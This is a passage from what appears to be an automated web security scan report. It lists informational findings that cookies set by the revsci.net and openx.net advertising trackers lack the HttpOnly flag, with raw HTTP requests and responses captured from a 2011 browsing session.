NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_GcbX="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_8DRJ=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; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:14 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:13 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

11.45. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/235941171.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/235941171.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; 
rtc_gNkk=MLvn9jM1Jgpr54aeFy58YLrc3TPJXKuUhF+WKpWQ6BT9vtIMiLEgfriSIH+6oN7+gF9hY+HDTba4RTjzA519wkRHZcOAJEo4DQzt2Om/hARoMTcLYKE4b9Mk3IyFloX4lVi/0zObRRfG/BqiXqBUCsu9DR7K8008eZg4eQFvS5MzWThlk8WWNcoC9XDBsIaSi9nd4TH7BLUfaDl5nZIqlDBCeZfsq5IrZg73tkP4E2yiMsBY+NuBZX/1qeiF34a22ee6sDUKIxVpAmcv4nhe0LXvJDdS4iC9TldQnJlW761Iu9PGbayZw9MbzArkTKcIpHM8E+Os9AEPY7O6oRLRFFyxBRbtX2QSKiWNR4VoM+1FCrFdKyVCKiEd38QdLXcycGkOqfOJf5mxNMKGG/62UDrXysoExPPPkaHRyNEHI4ONCijKQeNg4Tprvy8xiEFwV7pUk55r0Uf1rdz5sbPL7rDAOQlrKYryCdPj5wFP0f++d1twsfNbWi2huPm8m9HwoNU954aVSLkceBGu9dZOOeetxqPewEdPxHyIsSaGmEvexjPrrTASD7QsT02gWWSHW6XI18VbNNmdwjIzFNi9N/mKv/c2e8XGnbl1ez0CVJlIRwDHnpB5xxpxtuaL0vbsvZRbeDRddVgKA0cJZNJD8DDM7rUBqzYYszdunVBZVxY0glO22UJOzGb/NDQu0BGtbZfxBLGNlTiP9AO2CFcUcKHFmIJAx1JvsBzyrM313xt+ttLSnlFFRcq7AIRyDyp+Fi3Ya4huqfx/m2rVBVeIPWWLZl9/uf1fJxiZUh24CF0po6s/LTg86FUZaYZX0mjFKIpDqS5VJRc3jo7RApI74eEZL1xDHCxCze1ohFq8jgKcdbQI0CevEfWbM5FfaReCoyHlCaobvF0GYEKHQr2V9hnv35BhxzEI25L5lfm77cKyt8xfrmiQHYpQRzApKVFb3YTmHMKZFZJ64J6V6dDZp+G3p21fv6Dtj/0ZO9hXpY2vSIg/P30WadGL5q4VYNVErOo9p1L3F5Ybowv7Kmvxa0p/j7UyrpFwLWGddArBKxiAY/TVYJh/JMQugWKt3nlJuinIfJ8GKIUGE0jyIIf3iFRaCfSGcDPYJdB8BT/JXEMxKRqqS6DypKcvjzS/tBZUwiCAJFx/9EyC7Y87mcVjmsr+3GbkMQQmeaMgxD0jmFUuKkH02ny91Jb5+VtUPGmjNrdl2KGe9TtIAY3t0ofHQrz6otIYD8qi8HUiWJmdRBsAS6wZPWrTrxM8m8vRALbZxPLLa/Lw/YlHTsMwQ3CyMzERhkgwh7Nwh+Ff3K6N0wPsQRrFWrKJr/04MNRKN8eEmpJxELGcZgeCELAurmuXmhOrwANWiFr6Y5D+Nzh7XaZ5QAjjEHnPx/yzNVRCoPQCBeMc063urg5UAbQDdyBdbr8brehaHtwit48XrkXPxYVmgHeTZBZElWHgm84RIXxtS3oPYdhov2zAM5MjoZfz0kW/1QnUeIEHrIYojONHEGCFUYZbk9fgVO477YrqJm74Ild5/OnZXA5njF+ln1ytVEFTrBYq0oDHk8Ba5wiiEL065y18CXWfM8ucXNv9fbeZ2ooHI8QbxxoTx/uHwt2wpal+Xn30BUwfUt1JmeHJrpCyyzX4qN30Yd9DcYhQ6W47GnbjBcuu+pe+jx1T6sX7nRsFsziOctAgDKvHI0SVIrepM0q5rVA1gwIFolJeC0LGuOJPX6oSxwxzfvFYmR6e0G+eB+TIU0fkTsktG1e7YEC3Z5S3wAzn3TEOymS/ajl80qxtQbfDmRUKB5ZgYZDEQchUlMTjKwzUlZbzvODGAoDkHcyd5gATArIYcBJOivK2FGlFtWBaJQKi/5GQkLoXm9K9n5dvcxVPSw==; udm_0=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; 
rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gNkk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:55 GMT; Path=/
Set-Cookie: NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf417&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:36:55 GMT; Path=/
Set-Cookie: rtc_-pbG=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:55 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:54 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

11.46. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/498787488.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/498787488.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_GcbX="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; 
rtc_8DRJ=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; 
NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_8DRJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:17 GMT; Path=/
Set-Cookie: NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf469&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:38:17 GMT; Path=/
Set-Cookie: rtc_Wrpy=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:17 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

11.47. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/807655569.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/807655569.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_gNkk=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; udm_0=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; rsiPus_GcbX="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"; 
rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gNkk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140+hOXIQDbuItGF29/xEGUv1FubrqCfUW+jA6QVisncWnhlMqxnmqlK+Gc1/8AbHoS/xi5YHLnczfPRUA3gJWSaDZaFmfmF0EbSDNmBG1fOmAegAqCklFjFRrtAdnSEyzOR2vkTJEi+F1N5+bQ/fd1erj8QlOab2cEor5jviZ97kXMiuRXOnB2UFV7/sZIcaURRKz7Uv9MDPT3lhtVcyP2xRVRyIB4psUdE3oZ1iEDeZKV4pqzK81Wyg7bymxhKB6G54ZssFJisgx/lNHy5uZFwrV5vzCX8a4Dq/3NhTt8bwuFaMfJuP686aPFmTV7jIjz8eqnHWAdhFw/vhq3tRF22lFOsWi2fik5Qs1ygvLlS/AAOJambdMKAxMze9oyjqdue5KVscRaaSTDBR39m2I6WGpJnYWoZPwOlbOq289rSmuxrvYkJOUvJ4nORGK5OA4MrlGrSkBzPLXgjMKYbLhlaLR9EzyZYjguS7YH1evU5W/7biSJhw8dNrcjfREGhQI8vP7himw/9oLG5wjurEMHM5qqesVXWTaHs2I5op7e8sn1oXTjw2vz5oUDUPn/XHNbt/PPPVr7OwRi48FzkovHuGO80YnTM=; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:48 GMT; Path=/
Set-Cookie: rtc_Siob=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:48 GMT; Path=/
Set-Cookie: NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf410&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:36:48 GMT; Path=/
X-Proc-ms: 7
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

11.48. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=2724386019227846218 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
